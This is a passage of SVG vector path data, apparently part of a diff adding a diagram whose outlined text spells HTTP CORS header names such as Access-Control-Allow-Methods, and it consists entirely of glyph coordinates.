313.662813,38.36197 313.662813,40.1953125 C313.662813,41.0546918 313.545626,41.8476526 313.31125,42.5742188 C313.076874,43.3007849 312.737034,43.932289 312.291719,44.46875 C311.846404,45.005211 311.277399,45.4244777 310.584688,45.7265625 C309.891976,46.0286473 309.110734,46.1796875 308.240938,46.1796875 Z M316.57875,46 C316.568333,40.9739332 316.563125,38.1197951 316.563125,37.4375 L317.36,37.4375 L317.4225,39.125 C317.729793,38.6145808 318.120414,38.1979183 318.594375,37.875 C319.068336,37.5520817 319.563123,37.390625 320.07875,37.390625 C320.292293,37.390625 320.521457,37.408854 320.76625,37.4453125 L320.695938,38.25 C320.508437,38.2187498 320.310522,38.203125 320.102188,38.203125 C319.378226,38.203125 318.770159,38.4882784 318.277969,39.0585938 C317.785779,39.6289091 317.539688,40.3046836 317.539688,41.0859375 L317.539688,46 L316.57875,46 Z M323.080625,46 L323.080625,37.4375 L324.057188,37.4375 L324.057188,46 L323.080625,46 Z M323.080625,35.6875 L323.080625,34.375 L324.049375,34.375 L324.049375,35.6875 L323.080625,35.6875 Z M328.605938,49.9765625 L328.48875,49.109375 L330.30125,49.109375 C330.702294,49.109375 331.056457,49.0742191 331.36375,49.0039062 C331.671043,48.9335934 331.930155,48.8424485 332.141094,48.7304688 C332.352032,48.618489 332.531718,48.4622406 332.680156,48.2617188 C332.828595,48.0611969 332.944479,47.8619802 333.027813,47.6640625 C333.111146,47.4661448 333.174948,47.209637 333.219219,46.8945312 C333.26349,46.5794255 333.290833,46.2903659 333.30125,46.0273438 C333.311667,45.7643216 333.316875,45.4322937 333.316875,45.03125 C333.316875,45.088542 333.311667,45.0755213 333.30125,44.9921875 L333.262188,44.453125 C332.934061,44.9479191 332.546044,45.3294257 332.098125,45.5976562 C331.650206,45.8658868 331.103337,46 330.4575,46 C329.947081,46 329.482242,45.9088551 329.062969,45.7265625 C328.643696,45.5442699 328.299949,45.3072931 328.031719,45.015625 C327.763488,44.7239569 327.53823,44.3906269 327.355938,44.015625 C327.173645,43.6406231 327.043438,43.2669289 326.965313,42.8945312 C326.887187,42.5221336 326.848125,42.1536477 326.848125,41.7890625 C326.848125,41.3307269 326.885885,40.8945333 326.961406,40.4804688 C327.036928,40.0664042 327.168437,39.6614603 327.355938,39.265625 C327.543439,38.8697897 327.777811,38.5273452 328.059063,38.2382812 C328.340314,37.9492173 328.70229,37.7174488 329.145,37.5429688 C329.587711,37.3684887 330.087706,37.28125 330.645,37.28125 C331.191878,37.28125 331.674946,37.3893218 332.094219,37.6054688 C332.513492,37.8216157 332.902811,38.1666643 333.262188,38.640625 L333.355938,37.4375 L334.215313,37.4375 L334.215313,45.375 C334.215313,45.7187517 334.211406,45.9960927 334.203594,46.2070312 C334.195781,46.4179698 334.164532,46.7044253 334.109844,47.0664062 C334.055156,47.4283872 333.979636,47.7252593 333.883281,47.9570312 C333.786927,48.1888032 333.639793,48.4453111 333.441875,48.7265625 C333.243957,49.0078139 333.005679,49.2291659 332.727031,49.390625 C332.448384,49.5520841 332.091617,49.6901036 331.656719,49.8046875 C331.221821,49.9192714 330.728336,49.9765625 330.17625,49.9765625 L328.605938,49.9765625 Z M330.5825,45.2109375 C330.96271,45.2109375 331.306457,45.1497402 331.61375,45.0273438 C331.921043,44.9049473 332.174947,44.7434906 332.375469,44.5429688 C332.575991,44.3424469 332.74526,44.1067722 332.883281,43.8359375 C333.021303,43.5651028 333.118958,43.2851577 333.17625,42.9960938 C333.233542,42.7070298 333.262188,42.4088557 333.262188,42.1015625 L333.262188,41.2109375 C333.262188,40.8046855 333.212709,40.4218768 333.11375,40.0625 C333.014791,39.7031232 332.862449,39.3710953 332.656719,39.0664062 C332.450989,38.7617172 332.168439,38.5208342 331.809063,38.34375 C331.449686,38.1666658 331.033023,38.078125 330.559063,38.078125 C330.173644,38.078125 329.825991,38.152343 329.516094,38.3007812 C329.206196,38.4492195 328.952293,38.6458321 328.754375,38.890625 C328.556457,39.1354179 328.389792,39.4218734 328.254375,39.75 C328.118958,40.0781266 328.023907,40.4127587 327.969219,40.7539062 C327.914531,41.0950538 327.887188,41.4453107 327.887188,41.8046875 C327.887188,42.1223974 327.911927,42.4309881 327.961406,42.7304688 C328.010886,43.0299494 328.099427,43.3333318 328.227031,43.640625 C328.354636,43.9479182 328.517395,44.2148426 328.715313,44.4414062 C328.91323,44.6679699 329.172342,44.8528639 329.492656,44.9960938 C329.81297,45.1393236 330.176248,45.2109375 330.5825,45.2109375 Z M337.38125,46 L337.38125,37.4375 L338.357813,37.4375 L338.357813,46 L337.38125,46 Z M337.38125,35.6875 L337.38125,34.375 L338.35,34.375 L338.35,35.6875 L337.38125,35.6875 Z M341.58625,46 L341.58625,37.4375 L342.43,37.4375 L342.562813,38.7578125 C342.870106,38.2994769 343.282862,37.9388034 343.801094,37.6757812 C344.319326,37.4127591 344.877914,37.28125 345.476875,37.28125 C346.461255,37.28125 347.185206,37.5520806 347.64875,38.09375 C348.112294,38.6354194 348.344063,39.4999941 348.344063,40.6875 L348.344063,46 L347.3675,46 L347.3675,40.25 C347.341458,39.4895795 347.180002,38.94271 346.883125,38.609375 C346.586249,38.27604 346.099274,38.109375 345.422188,38.109375 C344.646142,38.109375 344.012034,38.3046855 343.519844,38.6953125 C343.027654,39.0859395 342.719063,39.5911427 342.594063,40.2109375 C342.573229,40.4557304 342.562813,40.7109362 342.562813,40.9765625 L342.562813,46 L341.58625,46 Z M351.5725,46.2890625 L351.5725,44.640625 L352.970938,44.640625 L352.970938,46.2890625 L351.5725,46.2890625 Z M351.5725,38.7578125 L351.5725,37.125 L352.970938,37.125 L352.970938,38.7578125 L351.5725,38.7578125 Z M362.279375,41.5234375 L361.2325,40.8828125 L363.185625,38.1484375 L360.302813,37.46875 L360.646563,36.3125 L363.4825,37.5859375 L363.185625,34.171875 L364.490313,34.171875 L364.20125,37.5859375 L367.045,36.3125 L367.396563,37.4609375 L364.474688,38.1484375 C364.573646,38.2994799 364.848383,38.67057 365.298906,39.2617188 C365.749429,39.8528675 366.138748,40.3932267 366.466875,40.8828125 C366.284582,41.0130215 366.110105,41.1197912 365.943438,41.203125 C365.77677,41.2864588 365.607501,41.3906244 365.435625,41.515625 L363.810625,38.4921875 L362.279375,41.5234375 Z" id="Access-Control-Allow"></path>
+                <path d="M24.5187507,76 L29.0578132,64.375 L30.0187507,64.375 L34.3937507,76 L33.3625007,76 L31.8781257,72.0546875 L27.0578132,72.0546875 L25.5109382,76 L24.5187507,76 Z M27.4406257,71.3203125 L31.5187507,71.3203125 C30.3468698,67.9557123 29.6828139,65.9765655 29.5265632,65.3828125 C29.4640629,65.6119803 29.2583357,66.2213492 28.9093757,67.2109375 C28.5604156,68.2005258 28.2270856,69.1328081 27.9093757,70.0078125 L27.4406257,71.3203125 Z M39.9893757,76.1875 C39.1612465,76.1875 38.4425037,75.984377 37.8331257,75.578125 C37.2237476,75.171873 36.7706271,74.6419304 36.4737507,73.9882812 C36.1768742,73.3346321 36.0284382,72.6067748 36.0284382,71.8046875 C36.0284382,71.1901011 36.1169789,70.6119819 36.2940632,70.0703125 C36.4711474,69.5286431 36.7224469,69.0494812 37.0479694,68.6328125 C37.3734919,68.2161438 37.7927585,67.88672 38.3057819,67.6445312 C38.8188053,67.4023425 39.3904142,67.28125 40.0206257,67.28125 C40.432086,67.28125 40.8422382,67.335937 41.2510944,67.4453125 C41.6599506,67.554688 41.963333,67.6848951 42.1612507,67.8359375 L41.8565632,68.5625 C41.3201021,68.2604152 40.6846918,68.109375 39.9503132,68.109375 C39.0596837,68.109375 38.3539616,68.4466112 37.8331257,69.1210938 C37.3122897,69.7955763 37.0518757,70.6900986 37.0518757,71.8046875 C37.0518757,72.8724012 37.3109876,73.7356738 37.8292194,74.3945312 C38.3474512,75.0533887 39.0544753,75.3828125 39.9503132,75.3828125 C40.5753163,75.3828125 41.2471846,75.2265641 41.9659382,74.9140625 L42.1143757,75.609375 C41.8695828,75.7916676 41.5518776,75.9335932 41.1612507,76.0351562 C40.7706237,76.1367193 40.3800026,76.1875 39.9893757,76.1875 Z M48.2334381,76.1875 C47.405309,76.1875 46.6865662,75.984377 46.0771881,75.578125 C45.4678101,75.171873 45.0146896,74.6419304 44.7178131,73.9882812 C44.4209366,73.3346321 44.2725006,72.6067748 44.2725006,71.8046875 C44.2725006,71.1901011 44.3610414,70.6119819 44.5381256,70.0703125 C44.7152099,69.5286431 44.9665094,69.0494812 45.2920319,68.6328125 C45.6175543,68.2161438 46.036821,67.88672 46.5498444,67.6445312 C47.0628678,67.4023425 47.6344766,67.28125 48.2646881,67.28125 C48.6761485,67.28125 49.0863007,67.335937 49.4951569,67.4453125 C49.9040131,67.554688 50.2073955,67.6848951 50.4053131,67.8359375 L50.1006256,68.5625 C49.5641646,68.2604152 48.9287543,68.109375 48.1943756,68.109375 C47.3037462,68.109375 46.5980241,68.4466112 46.0771881,69.1210938 C45.5563522,69.7955763 45.2959381,70.6900986 45.2959381,71.8046875 C45.2959381,72.8724012 45.5550501,73.7356738 46.0732819,74.3945312 C46.5915136,75.0533887 47.2985378,75.3828125 48.1943756,75.3828125 C48.8193788,75.3828125 49.491247,75.2265641 50.2100006,74.9140625 L50.3584381,75.609375 C50.1136452,75.7916676 49.7959401,75.9335932 49.4053131,76.0351562 C49.0146862,76.1367193 48.6240651,76.1875 48.2334381,76.1875 Z M56.4696881,76.1875 C55.2873905,76.1875 54.3485978,75.7916706 53.6532819,75 C52.9579659,74.2083294 52.6103131,73.1354234 52.6103131,71.78125 C52.6103131,70.4739518 52.9501535,69.40365 53.6298444,68.5703125 C54.3095353,67.736975 55.1884327,67.3072918 56.2665631,67.28125 C57.2717765,67.28125 58.0790601,67.6406214 58.6884381,68.359375 C59.2978162,69.0781286 59.6025006,70.0416606 59.6025006,71.25 C59.6025006,71.2968752 59.6011985,71.3919264 59.5985944,71.5351562 C59.5959902,71.6783861 59.5946881,71.7786455 59.5946881,71.8359375 L53.6337506,71.8359375 C53.6441673,72.9349013 53.9097897,73.8059864 54.4306256,74.4492188 C54.9514616,75.0924511 55.6389547,75.4140625 56.4931256,75.4140625 C57.0504201,75.4140625 57.5347902,75.348959 57.9462506,75.21875 C58.357711,75.088541 58.7873942,74.903647 59.2353131,74.6640625 L59.3993756,75.390625 C58.534788,75.9218777 57.5582352,76.1875 56.4696881,76.1875 Z M53.6728131,71.0546875 L58.5478131,71.0546875 C58.5478131,70.1015577 58.342086,69.3710963 57.9306256,68.8632812 C57.5191652,68.3554662 56.9540667,68.1015625 56.2353131,68.1015625 C55.5061428,68.1015625 54.917607,68.3723931 54.4696881,68.9140625 C54.0217692,69.4557319 53.7561469,70.1692664 53.6728131,71.0546875 Z M64.8700006,76.1953125 C64.3179145,76.1953125 63.7996905,76.1276048 63.3153131,75.9921875 C62.8309357,75.8567702 62.448127,75.6953134 62.1668756,75.5078125 L62.3075006,74.6953125 C63.1668799,75.1432314 63.9897883,75.3671875 64.7762506,75.3671875 C66.187716,75.3671875 66.9194795,74.8437552 66.9715631,73.796875 C66.9715631,73.3593728 66.8296374,73.0156262 66.5457819,72.765625 C66.2619263,72.5156238 65.6929215,72.2552097 64.8387506,71.984375 C64.3908317,71.8281242 64.1434383,71.7421876 64.0965631,71.7265625 C62.7580147,71.3203105 62.0835423,70.5989635 62.0731256,69.5625 C62.0731256,68.9635387 62.3374459,68.4335961 62.8660944,67.9726562 C63.3947428,67.5117164 64.1095794,67.28125 65.0106256,67.28125 C65.9116718,67.28125 66.7580175,67.4583316 67.5496881,67.8125 L67.2215631,68.53125 C66.4194758,68.2291652 65.6746915,68.078125 64.9871881,68.078125 C64.3830184,68.078125 63.9077627,68.2135403 63.5614069,68.484375 C63.215051,68.7552097 63.0418756,69.1197894 63.0418756,69.578125 C63.0418756,69.9635436 63.1551557,70.2591136 63.3817194,70.4648438 C63.608283,70.6705739 64.0574972,70.8671866 64.7293756,71.0546875 C64.8022926,71.0755209 64.9364059,71.1223955 65.1317194,71.1953125 C65.3270328,71.2682295 65.4351047,71.3072916 65.4559381,71.3125 C66.3569843,71.588543 66.9858842,71.9153627 67.3426569,72.2929688 C67.6994295,72.6705748 67.8778131,73.1848926 67.8778131,73.8359375 C67.862188,74.5859413 67.5822429,75.1666646 67.0379694,75.578125 C66.4936958,75.9895854 65.7710468,76.1953125 64.8700006,76.1953125 Z M73.0750006,76.1953125 C72.5229145,76.1953125 72.0046905,76.1276048 71.5203131,75.9921875 C71.0359357,75.8567702 70.653127,75.6953134 70.3718756,75.5078125 L70.5125006,74.6953125 C71.3718799,75.1432314 72.1947883,75.3671875 72.9812506,75.3671875 C74.392716,75.3671875 75.1244795,74.8437552 75.1765631,73.796875 C75.1765631,73.3593728 75.0346374,73.0156262 74.7507818,72.765625 C74.4669262,72.5156238 73.8979215,72.2552097 73.0437506,71.984375 C72.5958317,71.8281242 72.3484383,71.7421876 72.3015631,71.7265625 C70.9630147,71.3203105 70.2885423,70.5989635 70.2781256,69.5625 C70.2781256,68.9635387 70.5424459,68.4335961 71.0710943,67.9726562 C71.5997428,67.5117164 72.3145794,67.28125 73.2156256,67.28125 C74.1166718,67.28125 74.9630175,67.4583316 75.7546881,67.8125 L75.4265631,68.53125 C74.6244757,68.2291652 73.8796915,68.078125 73.1921881,68.078125 C72.5880184,68.078125 72.1127627,68.2135403 71.7664068,68.484375 C71.4200509,68.7552097 71.2468756,69.1197894 71.2468756,69.578125 C71.2468756,69.9635436 71.3601557,70.2591136 71.5867193,70.4648438 C71.813283,70.6705739 72.2624972,70.8671866 72.9343756,71.0546875 C73.0072926,71.0755209 73.1414059,71.1223955 73.3367193,71.1953125 C73.5320328,71.2682295 73.6401046,71.3072916 73.6609381,71.3125 C74.5619843,71.588543 75.1908842,71.9153627 75.5476568,72.2929688 C75.9044295,72.6705748 76.0828131,73.1848926 76.0828131,73.8359375 C76.067188,74.5859413 75.7872429,75.1666646 75.2429693,75.578125 C74.6986958,75.9895854 73.9760468,76.1953125 73.0750006,76.1953125 Z M78.3581256,71.8515625 L78.3581256,70.9921875 L82.1393756,70.9921875 L82.1393756,71.8515625 L78.3581256,71.8515625 Z M90.0475006,76.1796875 C89.1568711,76.1796875 88.3626082,76.0273453 87.6646881,75.7226562 C86.9667679,75.4179672 86.3977632,74.9947944 85.9576568,74.453125 C85.5175504,73.9114556 85.1842204,73.2760453 84.9576568,72.546875 C84.7310932,71.8177047 84.6178131,71.0182335 84.6178131,70.1484375 C84.6178131,68.9921817 84.8300505,67.9674524 85.2545318,67.0742188 C85.6790131,66.1809851 86.3131213,65.4739609 87.1568756,64.953125 C88.0006298,64.4322891 88.9980156,64.171875 90.1490631,64.171875 C91.4146944,64.171875 92.4928086,64.4374973 93.3834381,64.96875 L92.9068756,65.7421875 C92.0943715,65.2526017 91.177714,65.0078125 90.1568756,65.0078125 C89.4433303,65.0078125 88.8027117,65.1419257 88.2350006,65.4101562 C87.6672894,65.6783868 87.2024503,66.0494768 86.8404693,66.5234375 C86.4784883,66.9973982 86.2024494,67.5468719 86.0123443,68.171875 C85.8222392,68.7968781 85.7271881,69.4739547 85.7271881,70.203125 C85.7271881,70.9166702 85.8144268,71.5768199 85.9889068,72.1835938 C86.1633868,72.7903676 86.426405,73.3320289 86.7779693,73.8085938 C87.1295336,74.2851586 87.5969768,74.6601549 88.1803131,74.9335938 C88.7636493,75.2070326 89.4355176,75.34375 90.1959381,75.34375 C91.0136505,75.34375 91.9250997,75.1171898 92.9303131,74.6640625 L93.1334381,75.46875 C92.3730176,75.9427107 91.344382,76.1796875 90.0475006,76.1796875 Z M99.2681255,75.4140625 C99.8931287,75.4140625 100.420467,75.2486996 100.850157,74.9179688 C101.279846,74.5872379 101.592343,74.1510444 101.787657,73.609375 C101.98297,73.0677056 102.080626,72.445316 102.080626,71.7421875 C102.080626,70.6380153 101.846253,69.7500034 101.377501,69.078125 C100.908748,68.4062466 100.195214,68.0703125 99.2368755,68.0703125 C98.6118724,68.0703125 98.0793257,68.2382796 97.6392193,68.5742188 C97.1991129,68.9101579 96.8775015,69.3502577 96.6743755,69.8945312 C96.4712495,70.4388048 96.369688,71.0624965 96.369688,71.765625 C96.369688,72.8333387 96.6183835,73.7083299 97.1157818,74.390625 C97.6131801,75.0729201 98.3306208,75.4140625 99.2681255,75.4140625 Z M99.197813,76.1875 C98.4217675,76.1875 97.7381806,75.9921895 97.1470318,75.6015625 C96.555883,75.2109355 96.1053667,74.6809929 95.7954693,74.0117188 C95.4855719,73.3424446 95.3306255,72.5859417 95.3306255,71.7421875 C95.3306255,71.1067677 95.4204684,70.5169298 95.6001568,69.9726562 C95.7798452,69.4283827 96.036353,68.9570332 96.369688,68.5585938 C96.703023,68.1601543 97.1170814,67.8476574 97.6118755,67.6210938 C98.1066697,67.3945301 98.6561433,67.28125 99.260313,67.28125 C100.0624,67.28125 100.757706,67.4778626 101.346251,67.8710938 C101.934795,68.2643249 102.376197,68.7929654 102.670469,69.4570312 C102.964742,70.1210971 103.111876,70.8775999 103.111876,71.7265625 C103.111876,72.5807334 102.960835,73.3411425 102.658751,74.0078125 C102.356666,74.6744825 101.906149,75.2044251 101.307188,75.5976562 C100.708227,75.9908874 100.005109,76.1875 99.197813,76.1875 Z M105.848126,76 L105.848126,67.4375 L106.691876,67.4375 L106.824688,68.7578125 C107.131981,68.2994769 107.544738,67.9388034 108.062969,67.6757812 C108.581201,67.4127591 109.139789,67.28125 109.738751,67.28125 C110.72313,67.28125 111.447082,67.5520806 111.910626,68.09375 C112.37417,68.6354194 112.605938,69.4999941 112.605938,70.6875 L112.605938,76 L111.629376,76 L111.629376,70.25 C111.603334,69.4895795 111.441877,68.94271 111.145001,68.609375 C110.848124,68.27604 110.36115,68.109375 109.684063,68.109375 C108.908017,68.109375 108.273909,68.3046855 107.781719,68.6953125 C107.289529,69.0859395 106.980939,69.5911427 106.855938,70.2109375 C106.835105,70.4557304 106.824688,70.7109362 106.824688,70.9765625 L106.824688,76 L105.848126,76 Z M118.092188,76.1796875 C117.373434,76.1796875 116.847398,76.0169287 116.514063,75.6914062 C116.180728,75.3658838 116.014063,74.8359412 116.014063,74.1015625 L116.014063,68.1484375 L114.803126,68.1484375 L114.873438,67.5625 L116.029688,67.453125 L116.287501,65.4921875 L116.967188,65.4453125 L116.967188,67.4375 L119.467188,67.4375 L119.467188,68.1484375 L116.967188,68.1484375 L116.967188,73.8984375 C116.967188,74.5026072 117.066145,74.9075511 117.264063,75.1132812 C117.461981,75.3190114 117.810936,75.421875 118.310938,75.421875 C118.633856,75.421875 119.034894,75.3619798 119.514063,75.2421875 L119.553126,75.9921875 C118.922914,76.1171881 118.43594,76.1796875 118.092188,76.1796875 Z M121.805,76 C121.794584,70.9739332 121.789375,68.1197951 121.789375,67.4375 L122.58625,67.4375 L122.64875,69.125 C122.956044,68.6145808 123.346665,68.1979183 123.820625,67.875 C124.294586,67.5520817 124.789373,67.390625 125.305,67.390625 C125.518543,67.390625 125.747708,67.408854 125.9925,67.4453125 L125.922188,68.25 C125.734687,68.2187498 125.536772,68.203125 125.328438,68.203125 C124.604476,68.203125 123.996409,68.4882784 123.504219,69.0585938 C123.012029,69.6289091 122.765938,70.3046836 122.765938,71.0859375 L122.765938,76 L121.805,76 Z M131.60375,75.4140625 C132.228754,75.4140625 132.756092,75.2486996 133.185782,74.9179688 C133.615471,74.5872379 133.927968,74.1510444 134.123282,73.609375 C134.318595,73.0677056 134.41625,72.445316 134.41625,71.7421875 C134.41625,70.6380153 134.181878,69.7500034 133.713125,69.078125 C133.244373,68.4062466 132.530839,68.0703125 131.5725,68.0703125 C130.947497,68.0703125 130.414951,68.2382796 129.974844,68.5742188 C129.534738,68.9101579 129.213126,69.3502577 129.01,69.8945312 C128.806874,70.4388048 128.705313,71.0624965 128.705313,71.765625 C128.705313,72.8333387 128.954008,73.7083299 129.451407,74.390625 C129.948805,75.0729201 130.666246,75.4140625 131.60375,75.4140625 Z M131.533438,76.1875 C130.757392,76.1875 130.073806,75.9921895 129.482657,75.6015625 C128.891508,75.2109355 128.440992,74.6809929 128.131094,74.0117188 C127.821197,73.3424446 127.66625,72.5859417 127.66625,71.7421875 C127.66625,71.1067677 127.756093,70.5169298 127.935782,69.9726562 C128.11547,69.4283827 128.371978,68.9570332 128.705313,68.5585938 C129.038648,68.1601543 129.452706,67.8476574 129.9475,67.6210938 C130.442295,67.3945301 130.991768,67.28125 131.595938,67.28125 C132.398025,67.28125 133.093331,67.4778626 133.681875,67.8710938 C134.27042,68.2643249 134.711822,68.7929654 135.006094,69.4570312 C135.300367,70.1210971 135.4475,70.8775999 135.4475,71.7265625 C135.4475,72.5807334 135.29646,73.3411425 134.994375,74.0078125 C134.692291,74.6744825 134.241774,75.2044251 133.642813,75.5976562 C133.043852,75.9908874 132.340734,76.1875 131.533438,76.1875 Z M140.34,76.1796875 C139.621247,76.1796875 139.09521,76.0169287 138.761875,75.6914062 C138.42854,75.3658838 138.261875,74.8359412 138.261875,74.1015625 L138.261875,64.109375 L139.215,64.03125 L139.215,74.046875 C139.215,74.5677109 139.310052,74.9270823 139.500157,75.125 C139.690262,75.3229177 139.978019,75.421875 140.363438,75.421875 C140.67594,75.421875 141.066561,75.3619798 141.535313,75.2421875 L141.574375,75.9921875 C141.063956,76.1171881 140.652502,76.1796875 140.34,76.1796875 Z M143.130938,71.8515625 L143.130938,70.9921875 L146.912188,70.9921875 L146.912188,71.8515625 L143.130938,71.8515625 Z M148.515625,76 L153.054688,64.375 L154.015625,64.375 L158.390625,76 L157.359375,76 L155.875,72.0546875 L151.054688,72.0546875 L149.507813,76 L148.515625,76 Z M151.4375,71.3203125 L155.515625,71.3203125 C154.343745,67.9557123 153.679689,65.9765655 153.523438,65.3828125 C153.460938,65.6119803 153.25521,66.2213492 152.90625,67.2109375 C152.55729,68.2005258 152.22396,69.1328081 151.90625,70.0078125 L151.4375,71.3203125 Z M162.572188,76.1796875 C161.853434,76.1796875 161.327398,76.0169287 160.994063,75.6914062 C160.660728,75.3658838 160.494063,74.8359412 160.494063,74.1015625 L160.494063,64.109375 L161.447188,64.03125 L161.447188,74.046875 C161.447188,74.5677109 161.542239,74.9270823 161.732344,75.125 C161.922449,75.3229177 162.210207,75.421875 162.595625,75.421875 C162.908127,75.421875 163.298748,75.3619798 163.7675,75.2421875 L163.806563,75.9921875 C163.296144,76.1171881 162.884689,76.1796875 162.572188,76.1796875 Z M167.94125,76.1796875 C167.222497,76.1796875 166.69646,76.0169287 166.363125,75.6914062 C166.02979,75.3658838 165.863125,74.8359412 165.863125,74.1015625 L165.863125,64.109375 L166.81625,64.03125 L166.81625,74.046875 C166.81625,74.5677109 166.911302,74.9270823 167.101407,75.125 C167.291512,75.3229177 167.579269,75.421875 167.964688,75.421875 C168.277189,75.421875 168.667811,75.3619798 169.136563,75.2421875 L169.175625,75.9921875 C168.665206,76.1171881 168.253752,76.1796875 167.94125,76.1796875 Z M174.700938,75.4140625 C175.325941,75.4140625 175.853279,75.2486996 176.282969,74.9179688 C176.712659,74.5872379 177.025156,74.1510444 177.220469,73.609375 C177.415783,73.0677056 177.513438,72.445316 177.513438,71.7421875 C177.513438,70.6380153 177.279065,69.7500034 176.810313,69.078125 C176.341561,68.4062466 175.628026,68.0703125 174.669688,68.0703125 C174.044685,68.0703125 173.512138,68.2382796 173.072032,68.5742188 C172.631925,68.9101579 172.310314,69.3502577 172.107188,69.8945312 C171.904062,70.4388048 171.8025,71.0624965 171.8025,71.765625 C171.8025,72.8333387 172.051196,73.7083299 172.548594,74.390625 C173.045992,75.0729201 173.763433,75.4140625 174.700938,75.4140625 Z M174.630625,76.1875 C173.85458,76.1875 173.170993,75.9921895 172.579844,75.6015625 C171.988695,75.2109355 171.538179,74.6809929 171.228282,74.0117188 C170.918384,73.3424446 170.763438,72.5859417 170.763438,71.7421875 C170.763438,71.1067677 170.853281,70.5169298 171.032969,69.9726562 C171.212658,69.4283827 171.469165,68.9570332 171.8025,68.5585938 C172.135835,68.1601543 172.549894,67.8476574 173.044688,67.6210938 C173.539482,67.3945301 174.088956,67.28125 174.693125,67.28125 C175.495213,67.28125 176.190518,67.4778626 176.779063,67.8710938 C177.367607,68.2643249 177.809009,68.7929654 178.103282,69.4570312 C178.397554,70.1210971 178.544688,70.8775999 178.544688,71.7265625 C178.544688,72.5807334 178.393648,73.3411425 178.091563,74.0078125 C177.789478,74.6744825 177.338962,75.2044251 176.74,75.5976562 C176.141039,75.9908874 175.437921,76.1875 174.630625,76.1875 Z M182.577813,76 L180.187188,67.4375 L181.202813,67.4375 L183.179375,75.0859375 C184.601257,70.512998 185.39552,67.9635443 185.562188,67.4375 L186.749688,67.4375 C188.306987,72.5208588 189.093438,75.0625 189.109063,75.0625 L190.999688,67.4375 L192.0075,67.4375 L189.655938,76 L188.530938,76 C188.515313,76.0052084 188.148129,74.8046995 187.429375,72.3984375 C186.710622,69.9921755 186.293959,68.5781271 186.179375,68.15625 C186.116875,68.4375014 185.879898,69.2304622 185.468438,70.5351562 C185.056977,71.8398503 184.661148,73.0781191 184.280938,74.25 C183.900728,75.4218809 183.708021,76.0052084 183.702813,76 L182.577813,76 Z M193.735938,71.8515625 L193.735938,70.9921875 L197.517188,70.9921875 L197.517188,71.8515625 L193.735938,71.8515625 Z M200.495625,76 L200.495625,64.375 L201.901875,64.375 L206.206563,74.1953125 L210.394063,64.375 L211.745625,64.375 L211.745625,76 L210.753438,76 L210.753438,68.1796875 L210.808125,65.5390625 L210.519063,66.4765625 L206.69875,75.3359375 L205.605,75.3359375 L201.737813,66.453125 L201.433125,65.515625 L201.487813,68.21875 L201.487813,76 L200.495625,76 Z M218.614688,76.1875 C217.43239,76.1875 216.493598,75.7916706 215.798282,75 C215.102966,74.2083294 214.755313,73.1354234 214.755313,71.78125 C214.755313,70.4739518 215.095153,69.40365 215.774844,68.5703125 C216.454535,67.736975 217.333432,67.3072918 218.411563,67.28125 C219.416776,67.28125 220.22406,67.6406214 220.833438,68.359375 C221.442816,69.0781286 221.7475,70.0416606 221.7475,71.25 C221.7475,71.2968752 221.746198,71.3919264 221.743594,71.5351562 C221.74099,71.6783861 221.739688,71.7786455 221.739688,71.8359375 L215.77875,71.8359375 C215.789167,72.9349013 216.054789,73.8059864 216.575625,74.4492188 C217.096461,75.0924511 217.783954,75.4140625 218.638125,75.4140625 C219.19542,75.4140625 219.67979,75.348959 220.09125,75.21875 C220.502711,75.088541 220.932394,74.903647 221.380313,74.6640625 L221.544375,75.390625 C220.679788,75.9218777 219.703235,76.1875 218.614688,76.1875 Z M215.817813,71.0546875 L220.692813,71.0546875 C220.692813,70.1015577 220.487086,69.3710963 220.075625,68.8632812 C219.664165,68.3554662 219.099066,68.1015625 218.380313,68.1015625 C217.651142,68.1015625 217.062607,68.3723931 216.614688,68.9140625 C216.166769,69.4557319 215.901147,70.1692664 215.817813,71.0546875 Z M226.929063,76.1796875 C226.210309,76.1796875 225.684273,76.0169287 225.350938,75.6914062 C225.017603,75.3658838 224.850938,74.8359412 224.850938,74.1015625 L224.850938,68.1484375 L223.64,68.1484375 L223.710313,67.5625 L224.866563,67.453125 L225.124375,65.4921875 L225.804063,65.4453125 L225.804063,67.4375 L228.304063,67.4375 L228.304063,68.1484375 L225.804063,68.1484375 L225.804063,73.8984375 C225.804063,74.5026072 225.90302,74.9075511 226.100938,75.1132812 C226.298855,75.3190114 226.64781,75.421875 227.147813,75.421875 C227.470731,75.421875 227.871769,75.3619798 228.350938,75.2421875 L228.39,75.9921875 C227.759789,76.1171881 227.272815,76.1796875 226.929063,76.1796875 Z M230.62625,76 L230.62625,64.1171875 L231.595,64.03125 L231.595,68.34375 C231.595,68.3854169 231.593698,68.4088541 231.591094,68.4140625 C231.58849,68.4192709 231.585886,68.4479164 231.583282,68.5 L231.571563,68.734375 C232.269483,67.7656202 233.269473,67.28125 234.571563,67.28125 C236.430947,67.28125 237.360625,68.4036346 237.360625,70.6484375 L237.360625,76 L236.399688,76 L236.399688,70.8359375 C236.399688,69.872391 236.251252,69.1757834 235.954375,68.7460938 C235.657499,68.3164041 235.134067,68.1015625 234.384063,68.1015625 C233.639267,68.1015625 233.019482,68.2981751 232.524688,68.6914062 C232.029894,69.0846374 231.725209,69.5911427 231.610625,70.2109375 C231.600209,70.4192719 231.595,70.7291646 231.595,71.140625 L231.595,76 L230.62625,76 Z M243.979688,75.4140625 C244.604691,75.4140625 245.132029,75.2486996 245.561719,74.9179688 C245.991409,74.5872379 246.303906,74.1510444 246.499219,73.609375 C246.694532,73.0677056 246.792188,72.445316 246.792188,71.7421875 C246.792188,70.6380153 246.557815,69.7500034 246.089063,69.078125 C245.62031,68.4062466 244.906776,68.0703125 243.948438,68.0703125 C243.323435,68.0703125 242.790888,68.2382796 242.350782,68.5742188 C241.910675,68.9101579 241.589064,69.3502577 241.385938,69.8945312 C241.182812,70.4388048 241.08125,71.0624965 241.08125,71.765625 C241.08125,72.8333387 241.329946,73.7083299 241.827344,74.390625 C242.324742,75.0729201 243.042183,75.4140625 243.979688,75.4140625 Z M243.909375,76.1875 C243.13333,76.1875 242.449743,75.9921895 241.858594,75.6015625 C241.267445,75.2109355 240.816929,74.6809929 240.507032,74.0117188 C240.197134,73.3424446 240.042188,72.5859417 240.042188,71.7421875 C240.042188,71.1067677 240.132031,70.5169298 240.311719,69.9726562 C240.491407,69.4283827 240.747915,68.9570332 241.08125,68.5585938 C241.414585,68.1601543 241.828644,67.8476574 242.323438,67.6210938 C242.818232,67.3945301 243.367706,67.28125 243.971875,67.28125 C244.773963,67.28125 245.469268,67.4778626 246.057813,67.8710938 C246.646357,68.2643249 247.087759,68.7929654 247.382032,69.4570312 C247.676304,70.1210971 247.823438,70.8775999 247.823438,71.7265625 